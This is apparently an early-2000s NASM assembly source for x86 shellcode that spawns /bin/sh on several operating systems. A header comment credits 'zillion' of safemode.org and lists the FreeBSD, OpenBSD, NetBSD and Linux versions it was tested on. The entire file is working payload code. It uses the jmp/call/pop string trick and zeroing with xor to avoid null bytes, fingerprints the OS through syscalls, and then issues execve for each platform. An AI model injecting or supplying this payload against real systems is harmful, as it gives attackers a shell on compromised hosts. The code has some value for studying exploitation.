BITS 32 ; Assembly code that can do an execve of /bin/sh on multiple operating ; systems. This code has been tested to work on the following systems: ; ; FreeBSD 4.6-PRERELEASE ; FreeBSD 4.5-RELEASE ; OpenBSD 3.0 ; NetBSD 1.5.2 ; Linux 2.0.36 ; Linux 2.2.12-20 ; Linux 2.2.16-22 ; Linux 2.4.7-xfs ; ; It should work on older OS versions aswell except for OpenBSD. The ; system call that is used to differ OpenBSD from NetBSD and FreeBSD ; is relatively new (thanks!). It might be possible to find a difference ; between newer and older OpenBSD versions but I rather waste time ; on finding a better way to fingerprint the operating system. ; ; Written by zillion (safemode.org) more details: http://safemode.org ; jmp short callit doit: ;;;;;;;;;;;;;;;;;;;;;;;;;;;; ; Basic string manipulation pop esi xor eax, eax mov byte [esi + 7], al ;;;;;;;;;;;;;;;;;;;;;;;;;;;; ; The os selector xor eax, eax xor ebx, ebx mov al,39 int 0x80 test eax,eax js linux xor eax, eax xor ebx,ebx mov ax, 272 int 0x80 test eax,eax jnz freenetbsd openbsd: xor eax,eax xor ebx,ebx push eax lea ebx,[esi + 5] push ebx push esi mov al,59 push eax int 0x80 freenetbsd: xor eax,eax lea ebx, [esi] mov long [esi + 8], ebx mov long [esi + 12], eax push eax lea ecx, [esi + 8] push ecx push esi mov al,59 push eax int 0x80 linux: xor eax,eax lea ebx, [esi] mov long [esi + 8], ebx mov long [esi + 12], eax mov byte al, 0x0b mov ebx, esi lea ecx, [esi + 8] lea edx, [esi + 12] int 0x80 callit: call doit db '/bin/sh'